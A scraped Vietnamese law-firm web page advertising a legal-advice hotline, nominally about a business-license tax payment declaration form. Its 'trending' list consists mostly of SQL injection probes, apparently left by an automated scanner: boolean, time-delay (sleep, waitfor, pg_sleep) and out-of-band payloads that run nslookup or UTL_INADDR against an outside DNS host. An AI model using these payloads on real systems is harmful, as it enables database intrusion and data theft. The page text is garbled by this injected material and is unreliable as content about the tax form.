Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai nộp tiền thuế môn bài

Cập nhật lần cuối lúc 15:27 ngày 22/04/2014

Đang được quan tâm
1
1
1
1
-1 OR 2+881-881-1=0+0+0+1 --
-1 OR 3+881-881-1=0+0+0+1 --
-1 OR 3*2<(0+5+881-881) --
1'"
\
-1 OR 3*2>(0+5+881-881) --
1
-1 OR 2+42-42-1=0+0+0+1
@@ELYNB
-1 OR 3+42-42-1=0+0+0+1
-1 OR 3*2<(0+5+42-42)
JyI=
-1 OR 3*2>(0+5+42-42)
-1' OR 2+196-196-1=0+0+0+1 --
-1' OR 3+196-196-1=0+0+0+1 --
-1' OR 3*2<(0+5+196-196) --
-1' OR 3*2>(0+5+196-196) --
-1' OR 2+449-449-1=0+0+0+1 or 'm9BePSCY'='
-1' OR 3+449-449-1=0+0+0+1 or 'm9BePSCY'='
-1' OR 3*2<(0+5+449-449) or 'm9BePSCY'='
-1' OR 3*2>(0+5+449-449) or 'm9BePSCY'='
-1" OR 2+64-64-1=0+0+0+1 --
-1" OR 3+64-64-1=0+0+0+1 --
-1" OR 3*2<(0+5+64-64) --
-1" OR 3*2>(0+5+64-64) --
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
-1; waitfor delay '0:0:3' --
-1); waitfor delay '0:0:3' --
-1); waitfor delay '0:0:0' --
-1); waitfor delay '0:0:9' --
1 waitfor delay '0:0:3' --
FjNa3MAA'; waitfor delay '0:0:3' --
-1;select pg_sleep(6); --
-1);select pg_sleep(6); --
-1));select pg_sleep(9); --
Pqws7TVO';select pg_sleep(9); --
yk4OOAmh');select pg_sleep(3); --
8sGDoNh2');select pg_sleep(9); --
LYYas8CX'));select pg_sleep(9); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5264.34060.ec064.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5265.34060.ec064.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5267.34060.ec064.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5268.34060.ec064.\1.bxss.me
255'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: